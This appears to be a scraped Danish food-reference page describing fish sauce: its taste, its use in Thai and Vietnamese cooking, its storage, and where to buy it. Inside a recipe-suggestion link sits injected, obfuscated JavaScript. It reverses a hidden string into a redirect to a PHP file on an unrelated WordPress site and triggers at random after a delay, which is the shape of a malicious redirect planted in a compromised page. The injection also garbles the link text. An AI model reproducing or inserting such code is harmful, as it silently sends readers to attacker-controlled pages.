Fiskesauce

Sæson
Fås hele året.

Smag
Fiskesauce kan nærmest beskrives som flydende umami. Saucen lugter ret fælt af fisk, men det skal man ikke lade sig skræmme af, for når fiskelugten er fordampet efterlades en fyldig og aromatisk salt smag, der er rig på umami.

Prøv fx Grøn thai-karrysuppe

Anvendelse
Fiskesauce fremstilles af saltede og gærede fisk og skaldyr. Det lyder ikke umiddelbart som nogen delikatesse, og lugten er som sagt heller ikke appetitlig, men fiskesauce er et glimrende krydderi, som bruges med rund hånd i hele Sydøstasien, herunder Thailand, Vietnam, Laos og Cambodja. Fiskesauce bruges som krydderi i maden, hvor den både salter og tilfører den eftertragtede umamismag, som stammer fra indholdet af glutamat. Derudover fremhæver den også de øvrige smage i retten. Den brune, tyndtflydende sauce bruges ofte i varme retter, så den lidt ramme fiskesmag kan fordampe. Et par teskefulde i en thaisuppe eller wokmad løfter smagen på en helt anden og mere dyb måde, end man kan opnå med almindeligt salt. Et enkelt dryp eller to kan også være godt i marinader, dressinger og sauce, men når fiskesaucen ikke varmes op, skal den bruges med forsigtighed, så fiskelugten ikke tager over og parfumerer retten à la Esbjerg Fiskerihavn.

Prøv fx $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andler-koriander/”>Kokoskylling i mandler og koriander

Opbevaring
I køleskab efter åbning.

Hvor kan den købes
I velassorterede supermarkeder, asiatiske supermarkeder og helsekostbutikker.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere